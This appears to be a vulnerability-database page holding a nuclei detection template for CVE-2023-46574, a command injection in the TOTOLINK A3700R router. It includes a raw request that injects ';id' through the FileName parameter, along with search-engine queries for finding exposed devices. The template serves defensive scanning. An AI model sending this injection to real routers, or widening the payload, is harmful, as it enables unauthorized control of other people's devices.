Lucene search
K

TOTOLINK A3700R - Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 110 Views

TOTOLINK A3700R v.9.1.2u.6165_20211012 has a critical Command Injection vulnerability, allowing remote attackers to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Command Injection in Totolink A3700R_Firmware
10 Aug 202313:15
githubexploit
ATTACKERKB
CVE-2023-46574
25 Oct 202318:17
attackerkb
BDU FSTEC
The vulnerability of the UploadFirmwareFile() function in the microprogramming software for TOTOLINK A3700R allows a hacker to execute arbitrary code.
6 Feb 202400:00
bdu_fstec
Circl
CVE-2023-46574
25 Oct 202322:49
circl
CNNVD
TOTOLINK A3700R 命令注入漏洞
25 Oct 202300:00
cnnvd
CNVD
TOTOLINK A3700R Command Execution Vulnerability
27 Oct 202300:00
cnvd
CVE
CVE-2023-46574
24 Oct 202300:00
cve
Cvelist
CVE-2023-46574
24 Oct 202300:00
cvelist
NVD
CVE-2023-46574
25 Oct 202318:17
nvd
OSV
CVE-2023-46574
25 Oct 202318:17
osv
Rows per page
id: CVE-2023-46574

info:
  name: TOTOLINK A3700R - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.
  impact: |
    Unauthenticated attackers can execute arbitrary commands on the router, potentially gaining full device control and compromising network security.
  remediation: |
    Update TOTOLINK A3700R firmware to a version newer than 9.1.2u.6165_20211012.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46574
    - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
    - https://github.com/Marco-zcl/POC
    - https://github.com/d4n-sec/d4n-sec.github.io
    - https://github.com/wy876/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46574
    cwe-id: CWE-77
    epss-score: 0.65412
    epss-percentile: 0.99162
    cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: totolink
    product: a3700r_firmware
    shodan-query:
      - title:"Totolink"
      - http.title:"totolink"
    fofa-query: title="totolink"
    google-query: intitle:"totolink"
  tags: cve,cve2023,totolink,router,iot,rce,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<title>TOTOLINK</title>")'
        condition: and

  - raw:
      - |
        GET /cgi-bin/cstecgi.cgi HTTP/1.1
        Host: {{Hostname}}

        {"topicurl":"UploadFirmwareFile","FileName":";id"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200e04905a739499c0cf290bb2e5726d0839d68d10efb3da51060dd208ffc9b3b002210083b58d6e7bd56d5fcc51a1788f5754aba0d609bc2f58112b879a04034ee7b2cd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.65412
SSVC
110